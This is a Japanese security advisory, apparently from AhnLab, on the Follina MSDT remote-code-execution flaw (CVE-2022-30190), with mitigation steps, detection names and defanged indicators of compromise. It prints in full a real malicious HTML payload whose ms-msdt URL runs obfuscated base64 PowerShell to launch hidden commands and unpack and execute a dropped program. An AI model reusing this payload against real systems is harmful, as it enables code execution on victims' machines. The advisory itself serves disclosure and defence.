注意!MS Office のゼロデイ脆弱性 Follina (CVE-2022-30190)

Follina と呼ばれる新たな脆弱性 CVE-2022-30190 が公開された。Microsoft によると、この脆弱性は Word のような呼び出しアプリケーションで、URL プロトコルを使用して MSDT を呼び出す際に、遠隔コードが実行される脆弱性が発生する。この脆弱性が発生すると、呼び出しアプリケーションの権限において任意のコードを実行でき、追加プログラムのインストール、またはデータの確認や変更および削除が可能になる。

1. 脆弱性のマルウェアの例

この脆弱性が確認された Word ドキュメントでは、既知の方法の External タグに作成された URL に接続して、脆弱性を発生させる HTML ファイルがダウンロードおよび実行されることで発生していた。(現在はこの URL が無効になっているため、追加の動作は行われない)Word が実行されると同時に、当該 URL にアクセスしてダウンロードされた HTML の MSDT が呼び出され、脆弱性が発生することで不正なコードの実行が可能になる。

[図1] – Word ドキュメント内の External タグ URL への接続の試み
[図2] – document.xml.rels の内容

外部資料(英文で提供)に公開された上記の RDF8421.html の内容は、以下のコードの通りであり、注釈の下部に ms-msdt を実行させるコードが挿入されている。このように ms-msdt を通して、攻撃者が意図したコードの実行が可能になり、それにより様々な攻撃が可能になる。

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-- 中略 --

//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

2. 脆弱性の対応方法

Microsoft から公開(英文で提供)された対応方法は以下の通りである。

  • MSDT URL プロトコルの無効化
    1. コマンドプロトコル(cmd.exe)を管理者として実行
    2. レジストリキーをバックアップするために 「reg export HKEY_CLASSES_ROOT\ms-msdt filename」 コマンドの実行
    3. 「reg delete HKEY_CLASSES_ROOT\ms-msdt /f」 コマンドの実行

3. AhnLab 製品の対応状況

AhnLab では以下のような検知名でこの脆弱性のファイルおよび行為の検知が可能である。

  • (ファイル検知名) Exploit/HTML.CVE-2022-30190.S1841
  • (行為検知名) Behavior/MDP.Event.M4313

[IOC]

hxxps://www.xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html
52945af1def85b171870b31fa4782e52
d1fe26b84043ac11fa5ddb90906e6d56

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

参考1) https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
参考2) https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

5 1 vote
評価する
Subscribe
Notify of
guest

1 コメント
Inline Feedbacks
View all comments
trackback

[…] 注意! MS Office のゼロデイ脆弱性 Follina (CVE-2022-30190) […]